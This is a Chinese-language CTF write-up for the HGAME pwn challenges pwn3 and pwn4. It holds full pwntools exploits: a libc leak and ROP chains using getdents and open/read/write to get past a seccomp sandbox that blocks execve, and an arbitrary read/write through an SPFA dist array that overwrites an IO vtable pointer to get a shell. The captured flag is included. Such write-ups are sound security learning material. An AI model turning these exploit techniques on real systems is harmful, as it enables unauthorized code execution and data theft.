HGAME

HGAME—-PWN

感觉题目质量挺高的，目前就做了pwn1,pwn3,pwn4.pwn1是一个简单的栈溢出，重点记录一下pwn3和pwn4的攻击思路，因为是我第一次见到这种思路。（全程被ayoung和mark带）

pwn3

题目提示反弹不了shell而且存flag的文件不叫flag,所以不能用传统的orw的rop来得到flag,沙盒里也禁用了一些函数

rootzhang@rootzhang-virtual-machine:~/get-shell/hgame/pwn3/to_give_out$ seccomp-tools dump ./vuln
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x0b 0xc000003e  if (A != ARCH_X86_64) goto 0013
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x09 0x00 0x40000000  if (A >= 0x40000000) goto 0013
 0004: 0x15 0x08 0x00 0x0000003b  if (A == execve) goto 0013
 0005: 0x15 0x07 0x00 0x00000142  if (A == execveat) goto 0013
 0006: 0x15 0x06 0x00 0x00000101  if (A == openat) goto 0013
 0007: 0x15 0x05 0x00 0x00000003  if (A == close) goto 0013
 0008: 0x15 0x04 0x00 0x00000055  if (A == creat) goto 0013
 0009: 0x15 0x03 0x00 0x00000086  if (A == uselib) goto 0013
 0010: 0x15 0x02 0x00 0x00000039  if (A == fork) goto 0013
 0011: 0x15 0x01 0x00 0x0000003a  if (A == vfork) goto 0013
 0012: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0013: 0x06 0x00 0x00 0x00000000  return KILL

有些沙盒是白名单，有些沙盒是黑名单，这个就是黑名单，可以看出禁用了execve函数不能反弹shell.

攻击思路

不能弹shell的话就得用orw来读flag,用orw的话得先知道对面文件名才行，mark提示说用getdents函数得到文件名再用orw得到flag,getdents函数的完整攻击思路是ogw,意即用open打开文件夹，用getdents函数把文件名在写程序里，然后用write函数写出来，这是调用他们时的参数构造

open('./',0x1000,0)
getdents(句柄（0）,地址，unsigned int count)
write(1,地址，unsigned int count)

先通过rop调用ogw得到flag文件名，然后调用orw读flag

脚本

from pwn import *
context.log_level='debug'
#sh=process('./vuln')
sh=remote('chuj.top',42614)
elf=ELF('./vuln')
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc=ELF('./libc-2.31.so')
'''
x0000000000401443: pop rdi; ret;
0x0000000000401441: pop rsi; pop r15; ret; 
0x000000000040143d: pop rsp; pop r13; pop r14; pop r15; ret; 
0x000000000011c371: pop rdx; pop r12; ret;
x0000000000066229: syscall; ret;
0x000000000004a550: pop rax; ret;
'''
#gdb.attach(sh,'b *0x00000000004013DC')
pop_rdi=0x0000000000401443
pop_rsi_r15=0x0000000000401441
main=0x401311
write_plt=elf.plt['write']
write_got=elf.got['write']
read_plt=elf.plt['read']
sh.recvuntil('size?\n')
sh.sendline('-1')
sh.recvuntil('content?\n')
bss_addr=0x404000
payload='a'*0x30+p64(bss_addr+0x100)+p64(pop_rdi)+p64(1)
payload+=p64(pop_rsi_r15)+p64(write_got)*2+p64(write_plt)
payload+=p64(main)
sh.sendline(payload)
sh.recvuntil('done!\n')
libc_base=u64(sh.recv(6).ljust(8,'\x00'))-libc.sym['write']
execve_addr=libc_base+libc.sym['execve']
binsh_addr=libc_base+next(libc.search('/bin/sh'))
system_addr=libc_base+libc.sym['system']
pop_rdx_r12=libc_base+0x000000000011c371
syscall_addr=libc_base+0x0000000000066229
pop_rax=libc_base+0x000000000004a550
b='b *{0}'.format(syscall_addr)
#gdb.attach(sh,b)
print hex(libc_base)
print hex(execve_addr)
sh.recvuntil('size?\n')
sh.sendline('-1')
sh.recvuntil('content?\n')
payload='a'*0x30+p64(bss_addr+0x100)+p64(pop_rdi)+p64(0)+p64(pop_rsi_r15)
payload+=p64(bss_addr+0x100)*2+p64(pop_rdx_r12)+p64(0x30)*2+p64(pop_rax)+p64(0)
payload+=p64(syscall_addr)+p64(main)
sh.sendline(payload)
sh.recvuntil('done!\n')
#sh.send('./\x00')
sh.send('flagd44b02e91a1d1648cbfc\x00')
sh.recvuntil('size?\n')
sh.sendline('-1')
sh.recvuntil('content?\n')
payload='a'*0x30+p64(bss_addr+0x100)+p64(pop_rdi)+p64(bss_addr+0x100)+p64(pop_rsi_r15)
payload+=p64(0)*2+p64(pop_rdx_r12)+p64(0)*2+p64(pop_rax)+p64(2)+p64(syscall_addr)
payload+=p64(pop_rdi)+p64(3)+p64(pop_rsi_r15)+p64(bss_addr+0x100)*2+p64(pop_rdx_r12)
payload+=p64(0x300)*2+p64(pop_rax)+p64(0)+p64(syscall_addr)+p64(pop_rdi)+p64(1)
payload+=p64(pop_rsi_r15)+p64(bss_addr+0x100)*2+p64(pop_rdx_r12)+p64(0x300)*2
payload+=p64(pop_rax)+p64(1)+p64(syscall_addr)+p64(main)
sh.sendline(payload)
sh.interactive()
#hgame{1-4dm1T~The-rop-ChA!N-M4YBE~TOoO0oooO0-l0Ng_And~$Orry_fOR_ThE~|Nc0NVenIENCE:(}

总结

感觉构造rop的挺好玩的

pwn4

程序就是spfa算法的实现，刚开始我就分析出思路了，就是利用dist进行任意读和任意写，本来打算是利用exit_hook拿shell的，改是能改成功，但是改成功后程序就异常退出了，他也不调用exit-hook啊，实现+调试+发现错误+定位错误就用了一天，晚上十二点多是在受不了就问了ayoung,他告诉我改写io虚表指针，我哪知道这是啥啊，第一次听，但是改io指针肯定是通过printf或者scanf实现的，我就进行慢慢调试程序，还真被我发现一些虚表了，mark利用io_file_jumps出了，我利用io_helper_jumps出了（四点出的）

脚本

from pwn import *
context.log_level='debug'

sh=remote('chuj.top',47250)
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
#sh=process('./spfa')
libc=ELF('./libc-2.31.so')
#gdb.attach(sh,'b main')
def pwn():
    #gdb.attach(sh,"b main")
    sh.sendlineafter('how many datas?\n>> ','3')
    sh.sendlineafter('how many nodes?\n>> ','2')
    sh.sendlineafter('how many edges?\n>> ','1')
    sh.recvuntil('input edges in the\n[from] [to] [distant]\nformat')
    sh.sendline(str(0x10))
    sh.sendline(str(0x20))
    sh.sendline(str(0x30))
    sh.sendlineafter('you want to start from which node?\n>> ',str(0x10))
    sh.sendlineafter(' to ?\n>>',str(-2275))
    sh.recvuntil('the length of the shortest path is ')
    dist_addr=int(sh.recvuntil('\n').split('\n')[0])-8+0x4720
    elf_base=dist_addr-0x4720-0x7000
    bss_addr=dist_addr-0x4720
    dock_addr=elf_base+0x16A5
    print hex(bss_addr)

    sh.sendlineafter('how many nodes?\n>> ','2')
    sh.sendlineafter('how many edges?\n>> ','1')
    sh.recvuntil('input edges in the\n[from] [to] [distant]\nformat')
    sh.sendline(str(0x30))
    sh.sendline(str(0x40))
    sh.sendline(str(0x50))
    sh.sendlineafter('you want to start from which node?\n>> ',str(0x10))
    sh.sendlineafter(' to ?\n>>',str(-2272))
    sh.recvuntil('the length of the shortest path is ')
    libc_base=int(sh.recvuntil('\n').split('\n')[0])-libc.sym['_IO_2_1_stdout_']
    print hex(libc.sym['_IO_file_jumps'])
    #io=libc_base+0x1ec8a0+0x38
    io=libc_base+libc.sym['_IO_file_jumps']+0x28
    print hex(io)

    sh.sendlineafter('how many nodes?\n>> ','2')
    sh.sendlineafter('how many edges?\n>> ','1')
    sh.recvuntil('input edges in the\n[from] [to] [distant]\nformat')
    sh.sendline(str(0x10))
    sh.sendline(str((io-dist_addr)/8))
    sh.sendline(str(dock_addr))
    #gdb.attach(sh)
    sh.sendlineafter('you want to start from which node?\n>> ',str(0x10))
    #sh.sendlineafter(' to ?\n>>','1')
    # sh.recvuntil('the length of the shortest path is ')

    # sh.sendlineafter('how many nodes?\n>> ','2')
    # sh.sendlineafter('how many edges?\n>> ','1')
    # sh.recvuntil('input edges in the\n[from] [to] [distant]\nformat')
    # sh.sendline(str(1))
    # sh.sendline('-2217')
    # gdb.attach(sh)
    # sh.sendline(str(bss_addr+0x100+0xd8+0x38))
    # sh.sendlineafter('you want to start from which node?\n>> ',str(0x10))
    # sh.sendlineafter(' to ?\n>>',str(-2272))
    # sh.recvuntil('the length of the shortest path is ')
    sh.interactive()

pwn()

总结

调试程序越来越熟练了，通过调试printf函数的执行过程也直观了解了虚表的作用，以后能任意写除了got表和exit，还能改写虚表拿shell了。